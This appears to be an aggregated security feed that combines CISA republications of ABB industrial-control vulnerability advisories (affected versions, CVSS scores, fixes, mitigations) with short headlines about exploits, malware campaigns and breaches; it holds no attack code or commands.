CVSS v3.1 base score: 5 (MEDIUM); vector string CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C

Background
Critical Infrastructure Sectors: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities
CVE-2026-0936: An Insertion of Sensitive Information into Log File vulnerability in B&R PVI client versions prior to 6.5 may be abused by an authenticated local attacker to gather credential information which is processed by the PVI client application. The logging function of the PVI client application is disabled by default and must be explicitly enabled by the user.

Affected Products
ABB B&R PVI (vendor: ABB): ABB PVI <6.5.0. Product status: fixed, known_affected.

Remediations
Vendor fix: The problem is corrected in the following product versions:
- PVI 6.5.0
Please note that PVI is included in the Automation Studio installation package and shares the same version number as the corresponding Automation Studio release. B&R recommends that customers apply the update at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.

Mitigation: This vulnerability is limited to the PVI client side application logging and does not impact any security related logging of the PVI server component. Logging is not enabled by default for PVI client applications. Activate logging on the client system only when it is required for troubleshooting, debugging or analysis. Ensure that all client side logging information is securely deleted after it is no longer needed. When enabling logging in PVI client applications, the storage path for the log files must be specified. Make sure that only the respective user has access to the directories where the logging information is stored. Refer to section "General security recommendations" for further advice on how to keep your system secure.

Acknowledgments
ABB PSIRT reported this vulnerability to CISA.

Notice
The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities:
- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of ABB PSIRT SA26P001 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-01-29
- 2026-01-29, Revision 1: Initial version.
- 2026-05-05, Revision 2: Initial CISA Republication of ABB PSIRT SA26P001 advisory

0
ABB B&R Automation Studio

Summary

ABB became aware of a vulnerability in the product versions listed as affected in the advisory. An update is available that resolves the vulnerability. Successful exploitation of this vulnerability may enable an attacker to masquerade as a trusted party when B&R Automation Studio establishes a connection with a server via the ANSL over TLS or OPC-UA protocol.

The following versions of ABB B&R Automation Studio are affected: Automation Studio <6.5, 6.5 (CVE-2025-11043)

CVSS v3: 7.4
Vendor: ABB
Equipment: ABB B&R Automation Studio
Vulnerabilities: Improper Certificate Validation

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2025-11043: An Improper Certificate Validation vulnerability in the OPC-UA client and ANSL over TLS client used in Automation Studio versions before 6.5 could allow an unauthenticated attacker on the network to position themselves to intercept and interfere with data exchanges.

Affected Products
ABB B&R Automation Studio
Vendor: ABB
Product Version: ABB Automation Studio <6.5
Product Status: fixed, known_affected

Remediations

Vendor fix: The problem is corrected in the following product version:
- B&R Automation Studio version 6.5
B&R recommends that customers apply the update at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.

Mitigation: To exploit this vulnerability, an attacker would need to intercept and redirect the communication between B&R Automation Studio and the target server, as well as present manipulated certificates that pass validation checks. B&R recommends operating B&R Automation Studio within Level 2 of the ABB ICS Cyber Security Reference Architecture when connecting to Level 1 devices via ANSL over TLS or OPC-UA. Operating in this trusted environment reduces the risk of successful exploitation drastically. Refer to section "General security recommendations" for further advice on how to keep your system secure.

Relevant CWE: CWE-295 Improper Certificate Validation

Metrics
CVSS Version: 3.1
Base Score: 7.4
Base Severity: HIGH
Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/RL:O/RC:C

Acknowledgments: ABB PSIRT reported this vulnerability to CISA.

Notice: The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Frequently Asked Questions

What causes the vulnerability?
- The vulnerability is caused by insufficient validation mechanisms for server certificates in the ANSL over TLS and OPC-UA client implementations.

What is B&R Automation Studio?
- B&R Automation Studio is an environment for developing and executing automation solutions, ranging from control and motion technology to HMI, operation, and integrated safety technology.

What might an attacker use the vulnerability to do?
- An attacker who successfully exploited this vulnerability could spoof a trusted server, potentially leading to the disclosure of confidential information or the alteration of data during transit.

How could an attacker exploit the vulnerability?
- An attacker could attempt to exploit this vulnerability by generating a maliciously crafted server certificate and manipulating network routing or name resolution to redirect traffic through a compromised node under their control. This would require that the attacker has access to the system network, by connecting to the network either directly or through a wrongly configured or penetrated firewall, or that he installs malicious software on a system node or otherwise infects the network with malicious software. Recommended practices help mitigate such attacks; see section Mitigating Factors above.

Could the vulnerability be exploited remotely?
- Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed.

What does the update do?
- The update removes the vulnerability by modifying the way that the ANSL and OPC-UA clients validate server certificates.

When this security advisory was issued, had this vulnerability been publicly disclosed?
- No, B&R discovered this vulnerability as a part of its own security analysis.

When this security advisory was issued, had B&R received any reports that this vulnerability was being exploited?
- No, B&R had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued.

Legal Notice and Terms of Use: This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer

This ICSA is a verbatim republication of ABB PSIRT SA25P004 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-01-19
Date / Revision / Summary
2026-01-19 / 1 / Initial Version
2026-05-05 / 2 / Initial CISA Republication of ABB PSIRT SA25P004 advisory

0
Google now offers up to $1.5 million for some Android exploits

Google overhauls its Android and Chrome vulnerability rewards programs, offering bounties of up to $1.5 million for the most difficult exploits while scaling back payouts for flaws that artificial intelligence (AI) has made easier to find. [...]

0
Karakurt extortion gang ‘cold case’ negotiator gets 8.5 years in prison

A Latvian national extradited to the United States was sentenced to 8.5 years in prison for his "cold case" negotiator role in the Russian Karakurt ransomware group. [...]

0
CloudZ malware abuses Microsoft Phone Link to steal SMS and OTPs

A new version of the CloudZ remote access tool (RAT) is deploying a previously unseen malicious plugin called Pheno that hijacks the Microsoft Phone Link connection to steal sensitive codes from mobile devices. [...]

0
ScarCruft hackers push BirdCall Android malware via game platform

The North Korean hacker group APT37 has been delivering an Android version of a backdoor called BirdCall in a supply-chain attack through a video game platform. [...]

0
US government warns of severe CopyFail bug affecting major versions of Linux

U.S. cybersecurity agency CISA says the CopyFail bug is being actively used in hacking campaigns, and poses a major risk to servers and data centers that rely on Linux.

0
Weaver E-cology critical bug exploited in attacks since March

Hackers have been exploiting a critical vulnerability (CVE-2026-22679) in the Weaver E-cology office automation platform since mid-March to run discovery commands. [...]

0
Physical Cargo Theft Gets a Boost From Cybercriminals

Cargo theft is no longer about small groups of criminals operating on the ground, but transnational cybercriminal syndicates using access to supply chain systems to reroute goods.

0
RMM Tools Fuel Stealthy Phishing Campaign

Attackers are abusing two remote monitoring and management (RMM) tools to evade detection in a campaign that has impacted over 80 organizations so far.

0
Exploit Cyber-Frenzy Threatens Millions via Critical cPanel Vulnerability

Shortly after the authentication-bypass flaw was disclosed, multiple proof-of-concept exploits appeared, and one researcher claims there has been zero-day activity for at least a month.

0
Hackers are mass-exploiting the cPanel bug to gain control of thousands of websites

Days after the disclosure of a critical vulnerability in popular web hosting software cPanel and WHM, hackers are now targeting and hacking thousands of vulnerable websites.

0
Trellix discloses data breach after source code repository hack

Cybersecurity firm Trellix disclosed a data breach after attackers gained access to "a portion" of its source code repository. [...]

0
A Vulnerability in WHM cPanel and WP Squared Could Allow for Remote Code Execution

A vulnerability has been discovered in WHM, cPanel, and WP Squared that could allow for remote code execution. WHM, cPanel, and WP Squared are Linux-based web hosting control panels for server and website management. While WHM provides server-level control, cPanel provides administrator access to the website backend, webmail, and databases. Successful exploitation could allow unauthenticated remote attackers to bypass authentication and gain unauthorized administrative access to the affected systems, ultimately leading to remote code execution.

0
Silver Fox Springs Tax-Themed Attacks on Orgs in India, Russia

More than 1,600 socially engineered messages from the China-backed advanced persistent threat (APT) group target various sectors to deliver the previously undocumented ABCDoor backdoor, ValleyRAT, and other malware.

0
They don’t hack, they borrow: How fraudsters target credit unions

Fraudsters aren't hacking credit unions, they are exploiting normal business processes. Flare reveals how structured loan fraud methods use stolen identities to pass verification and secure funds. [...]

0
Azure Hacking: New Cloudfoxable Challenges

Cloudfoxable started as a hands-on AWS security training tool. Now it's expanding. Bishop Fox has launched the first set of Azure challenges, giving security professionals a safe, intentionally misconfigured environment to explore identity-driven attack paths and privilege escalation in Azure.

0
Progress warns of critical MOVEit Automation auth bypass flaw

Progress Software warned customers to patch a critical authentication bypass vulnerability in its MOVEit Automation enterprise-grade managed file transfer (MFT) application. [...]

0
Webinar: Why MSPs must rethink security and backup strategies

Security breaches don't just test your defenses—they test your recovery. Join Kaseya in our upcoming webinar to learn how MSPs strengthen resilience with SaaS backups and BCDR to stay operational after attacks. [...]

0
76% of All Crypto Stolen in 2026 Is Now in North Korea

North Korean threat actors are pulling off historic cryptocurrency heists on a yearly, sometimes weekly basis now. AI might be helping them.

0
CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2026-31431 Linux Kernel Incorrect Resource Transfer Between Spheres Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

0
TeamPCP Hits SAP Packages With 'Mini Shai-Hulud' Attack

Several npm packages for SAP's cloud application development ecosystem have been compromised as TeamPCP's supply chain attacks broaden.

0
Another AI-Assisted Software Scan Yields 9-Year-Old Linux Bug

The proof-of-concept exploit code runs only 10 lines long, but luckily, a patch is already available.

0
Anthropic's Mythos Has Landed: Here's What Comes Next for Cyber

In this latest installment of the Reporters' Notebook video series, we discuss how the new AI model threatens to completely upend cybersecurity, and what industry leaders are telling the press.

0
FBI links cybercriminals to sharp surge in cargo theft attacks

The U.S. Federal Bureau of Investigation (FBI) warned the transportation and logistics industry of a sharp rise in cyber-enabled cargo theft, with estimated losses in the United States and Canada reaching nearly $725 million in 2025. [...]

0
Bitcoin Coinbase Premium threatens bear flag repeat with BTC price at $76K

Bitcoin price action risked repeating January's breakdown despite April being poised to offer the best monthly BTC price gains in a year.

0
Anti-DDoS Firm Heaped Attacks on Brazilian ISPs

A Brazilian tech firm that specializes in protecting networks from distributed denial-of-service (DDoS) attacks has been enabling a botnet responsible for an extended campaign of massive DDoS attacks against other network operators in Brazil, KrebsOnSecurity has learned. The firm's chief executive says the malicious activity resulted from a security breach and was likely the work of a competitor trying to tarnish his company's public image.

0
What Happens in the First 24 Hours After a New Asset Goes Live

When a new asset goes live, attackers start scanning within minutes. Sprocket Security shows how automated attacks move from discovery to compromise in under 24 hours. [...]

0
New Linux ‘Copy Fail’ flaw gives hackers root on major distros

An exploit has been published for a local privilege escalation vulnerability dubbed "Copy Fail" that impacts Linux kernels released since 2017, allowing an unprivileged local attacker to gain root permissions. [...]

0
ABB AWIN Gateways

Summary

Successful exploitation of these vulnerabilities could allow an attacker to remotely reboot the device or complete an unauthenticated query to reveal system configuration, including sensitive details.

The following versions of ABB AWIN Gateways are affected:
- ABB AWIN Firmware 2.0-0 installed on ABB AWIN GW100 rev.2
- ABB AWIN Firmware 2.0-1 installed on ABB AWIN GW100 rev.2
- ABB AWIN Firmware 1.2-0 installed on ABB AWIN GW120
- ABB AWIN Firmware 1.2-1 installed on ABB AWIN GW120

CVSS v3: 8.3
Vendor: ABB
Equipment: ABB AWIN Gateways
Vulnerabilities: Authentication Bypass by Capture-replay, Missing Authentication for Critical Function

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2025-13777: An unauthenticated query reveals data. Authentication Bypass due to Improper Session Validation.
Relevant CWE: CWE-294 Authentication Bypass by Capture-replay
Metrics: CVSS 3.1, Base Score 8.3, Base Severity HIGH, Vector String CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

CVE-2025-13778: An unauthenticated query allows an attacker to remotely reboot the device, potentially causing a denial of service.
Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS 3.1, Base Score 6.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-13779: An unauthenticated query reveals the system configuration, including sensitive details.
Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS 3.1, Base Score 8.3, Base Severity HIGH, Vector String CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

Affected Products (all three CVEs)
ABB AWIN Gateways
Vendor: ABB
Product Version: ABB AWIN Firmware 2.0-0 and 2.0-1 installed on ABB AWIN GW100 rev.2; ABB AWIN Firmware 1.2-0 and 1.2-1 installed on ABB AWIN GW120
Product Status: known_affected

Remediations (all three CVEs)

Mitigation: The following product versions have been fixed:
- ABB AWIN Firmware 2.1-0 installed on ABB AWIN GW100 rev. 2 (Product ID: 3BNP102988R1) is a fixed version for CVE-2025-13777, CVE-2025-13778 and CVE-2025-13779
- ABB AWIN Firmware 2.0-0 installed on ABB AWIN GW120 (Product ID: 3BNP103003R1) is a fixed version for CVE-2025-13777, CVE-2025-13778 and CVE-2025-13779

Mitigation: For more information see the associated ABB PSIRT security advisory 4JNO000329:
- ABB CYBERSECURITY ADVISORY - PDF Version: https://search.abb.com/library/Download.aspx?DocumentID=4JNO000329&LanguageCode=en&DocumentPartId=&Action=Launch
- ABB CYBERSECURITY ADVISORY - CSAF Version: https://psirt.abb.com/csaf/2026/4jno000329.json

Acknowledgments: Fred Alvarez reported these vulnerabilities to ABB.

Legal Notice and Terms of Use: This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely.

Revision History
Initial Release Date: 2026-04-30
Date / Revision / Summary
2026-04-30 / 1 / Initial Republication of ABB 4JNO000329

0
ABB Ability OPTIMAX

Summary

Successful exploitation of this vulnerability could allow an attacker to bypass user authentication on OPTIMAX installations that make use of the Azure Active Directory Single-Sign On integration.

The following versions of ABB Ability OPTIMAX are affected:
- ABB Ability OPTIMAX 6.1: vers:all/*
- ABB Ability OPTIMAX 6.2: vers:all/*
- ABB Ability OPTIMAX 6.3: <6.3.1-251120
- ABB Ability OPTIMAX 6.4: <6.4.1-251120

CVSS v3: 8.1
Vendor: ABB
Equipment: ABB Ability OPTIMAX
Vulnerabilities: Incorrect Implementation of Authentication Algorithm

Background
Critical Infrastructure Sectors: Energy, Water and Wastewater
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2025-14510: The vulnerability allows an attacker to bypass user authentication on OPTIMAX installations that make use of the Azure Active Directory Single-Sign On integration.

Affected Products
ABB Ability OPTIMAX
Vendor: ABB
Product Version: ABB Ability OPTIMAX 6.1: vers:all/*; ABB Ability OPTIMAX 6.2: vers:all/*; ABB Ability OPTIMAX 6.3: <6.3.1-251120; ABB Ability OPTIMAX 6.4: <6.4.1-251120
Product Status: known_affected

Remediations

Mitigation: The following product versions have been fixed:
- Ability OPTIMAX 6.3 6.3.1-251120 is a fixed version for CVE-2025-14510

Mitigation: For more information see the associated ABB PSIRT security advisory 9AKK108472A1331:
- ABB CYBERSECURITY ADVISORY - PDF Version: https://search.abb.com/library/Download.aspx?DocumentID=9AKK108472A1331&LanguageCode=en&DocumentPartId=&Action=Launch
- ABB CYBERSECURITY ADVISORY - CSAF Version: https://psirt.abb.com/csaf/2026/9akk108472a1331.json

Relevant CWE: CWE-303 Incorrect Implementation of Authentication Algorithm

Metrics
CVSS Version: 3.1
Base Score: 8.1
Base Severity: HIGH
Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Acknowledgments: ABB PSIRT reported this vulnerability to CISA.

Legal Notice and Terms of Use: This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability has a high attack complexity.

Revision History
Initial Release Date: 2026-04-30
Date / Revision / Summary
2026-04-30 / 1 / Initial Republication of ABB PSIRT 9AKK108472A1331

ABB PCM600

Summary
Successful exploitation of this vulnerability could allow an attacker to send specially crafted messages to the system node, resulting in execution of arbitrary code. The following versions of ABB PCM600 are affected: PCM600 >=1.5|<=2.13

CVSS v3: 4.4
Vendor: ABB
Equipment: ABB PCM600
Vulnerabilities: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2018-1002208
A vulnerability exists in the SharpZip.dll included in the product versions listed above. An attacker could exploit the vulnerability by providing a specially crafted message to the system node, causing the insertion and execution of arbitrary code.

Affected Products
ABB PCM600
Vendor: ABB
Product Version: ABB PCM600: >=1.5|<=2.13
Product Status: known_affected

Remediations
Vendor fix: The problem is corrected in the following product version: ABB Protection and control IED manager PCM600 version 2.14. ABB recommends that customers apply the update at the earliest convenience.
Vendor fix: Note: RE_630 protection relays are not compatible with PCM600 version 2.14. When using earlier PCM600 versions with RE_630, the known vulnerability must be mitigated through system-level defenses. For mitigation guidance, refer to the General Security Recommendations.
Vendor fix: The following product versions have been fixed: Protection and Control IED manager PCM600 2.14 is a fixed version for CVE-2018-1002208.
Mitigation: For more information see the associated ABB PSIRT security advisory 2NGA002813: ABB CYBERSECURITY ADVISORY - PDF version (https://search.abb.com/library/Download.aspx?DocumentID=2NGA002813&LanguageCode=en&DocumentPartId=pdf&Action=Launch), ABB CYBERSECURITY ADVISORY - CSAF version (https://psirt.abb.com/csaf/2025/2nga002813.json).

Relevant CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Metrics
CVSS Version: 3.1
Base Score: 4.4
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N

Acknowledgments
ABB PSIRT reported this vulnerability to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. This vulnerability has a high attack complexity.

Revision History
Initial Release Date: 2026-04-30
2026-04-30, Revision 1: Initial Republication of ABB PSIRT 2NGA002813

ABB Edgenius Management Portal

Summary
Successful exploitation of this vulnerability could allow an attacker to send a specially crafted message to the system node, allowing the attacker to install and run arbitrary code, uninstall applications, and modify the configuration of installed applications. The following versions of ABB Edgenius Management Portal are affected: Edgenius Management Portal 3.2.0.0|3.2.1.1

CVSS v3: 9.6
Vendor: ABB
Equipment: ABB Edgenius Management Portal
Vulnerabilities: Authentication Bypass Using an Alternate Path or Channel

Background
Critical Infrastructure Sectors: Critical Manufacturing, Information Technology
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2025-10571
The Edgenius Management Portal in the affected product versions contains a vulnerability that allows authentication to be bypassed. An attacker could exploit the vulnerability by sending a specially crafted message to the system node, allowing the attacker to install and run arbitrary code, uninstall installed applications and modify the configuration of installed applications.

Affected Products
ABB Edgenius Management Portal
Vendor: ABB
Product Version: ABB Edgenius Management Portal: 3.2.0.0|3.2.1.1
Product Status: known_affected

Remediations
Vendor fix: ABB has prepared an update to fix this vulnerability, included in the latest Roll-Up, ABB Ability Edgenius version 3.2.2.0. ABB advises customers to upgrade as soon as possible. Until the upgrade is applied, ABB advises customers to disable the Edgenius Management Portal to mitigate the vulnerability.
Vendor fix: All affected products: Exploitation requires an attacker to have gained access to the network where Edgenius has been deployed, and while the Edgenius Management Portal is running. Refer to section "General security recommendations" for further advice on how to keep your system secure.
Mitigation: All affected products: Workarounds are specific measures that a user can take to help block an attack; for example, temporarily disabling the vulnerable feature may remove the exposure, with well-known impact on functionality. ABB has tested the following workaround.
Mitigation: The following product versions have been fixed: Ability Edgenius 3.2.2.0 is a fixed version for CVE-2025-10571.
Mitigation: For more information see the associated ABB PSIRT security advisory 7PAA022088: ABB CYBERSECURITY ADVISORY - PDF version (https://search.abb.com/library/Download.aspx?DocumentID=7PAA022088&LanguageCode=en&DocumentPartId=&Action=Launch), ABB CYBERSECURITY ADVISORY - CSAF version (https://psirt.abb.com/csaf/2025/7paa022088.json).

Relevant CWE: CWE-288 Authentication Bypass Using an Alternate Path or Channel

Metrics
CVSS Version: 3.1
Base Score: 9.6
Base Severity: CRITICAL
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Acknowledgments
ABB PSIRT reported this vulnerability to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

